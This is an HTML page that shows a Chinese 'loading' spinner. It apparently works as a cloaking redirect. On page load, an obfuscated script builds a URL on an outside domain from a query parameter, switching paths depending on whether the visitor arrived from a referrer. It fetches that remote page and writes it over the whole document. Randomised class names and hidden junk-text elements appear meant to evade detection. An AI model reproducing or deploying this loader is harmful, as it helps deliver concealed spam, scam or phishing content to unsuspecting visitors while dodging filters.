<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KoPlgHPVrX {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KoPlgHPVrX .BBLIFb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KoPlgHPVrX .content {
            line-height: 50px;
            text-align: center
        }

        .KoPlgHPVrX .img {
            width: 100%
        }

        .KoPlgHPVrX .AYQROcr {
            text-align: center
        }

        .KoPlgHPVrX .AYQROcr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KoPlgHPVrX .AYQROcr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KoPlgHPVrX .AYQROcr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KoPlgHPVrX .AYQROcr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KoPlgHPVrX .AYQROcr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KoPlgHPVrX .AYQROcr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KoPlgHPVrX .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xt47at7YPVdI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nwv9UvX = xt47at7YPVdI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nwv9UvX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nwv9UvX +".html?a=share";
		}
		
        G826IU=url+"#"+new Date().getTime();
        G826IU && function() {
            $.get(G826IU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>wrephnl5Q6UH6WBPGOKv6HPaflZpLLUlckX456Vuvs6nw8WDc0nvRRoYx9YBdkxckDCpwkTG3jJxpPyogkZEtgn3</div>
<span style='display:none'>hRHZZWTcqki2fIY20YRZkB6NXXHg0aKgpNdGInwsGeZ</span>
<b style='display:none' >AUKpPlPGMUKfCLdig9MJRclkGZOeVa5ioJJoBYM8l6zLpyNfpEVPo9</b>
<ul style='display:none' >bHEWtywoqvk3RcG5r0RzPuZICQsalB9Vi3UmYeRmxbjoZoHP</ul>
<li style='display:none' >hTlDm636iYLG9MV</li>
<h1 style='display:none' >X6hdfkvfzZl00OSNh</h1><div class="KoPlgHPVrX">
    <div class="BBLIFb">
        <div class="AYQROcr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>MIgkAKCDiNuFag7iC5Dqz5Hpx3OM3r1ovUemMBjtNXoBgqFFdG4HPbP08pjMibYwTXhRf3XEfDBXWSiIWKoRr7f0yhD</p>
<h1 style='display:none' >z0rvPlA34kYesMzfeV51gUpU8WORHsWUSaJ7HywIx</h1>
<ul style='display:none' >BUZGfF2rNDniDPV9HphdeJ4thpDQ03dCo9ie1XF5JaFeQogrVIy0BBXySwhNjPnZcEWksPkyJ4NH4BkKVJhbUGM3</ul>
<img  src='' style='display:none'>
<span style='display:none'>r6LGNIel1EMN1S7mPEXZwjkBetFGfzQScA76as0ZT6YVSMGmvEqjljO5cVXROwa73a984DaVzjAkpDx</span></body>
</html>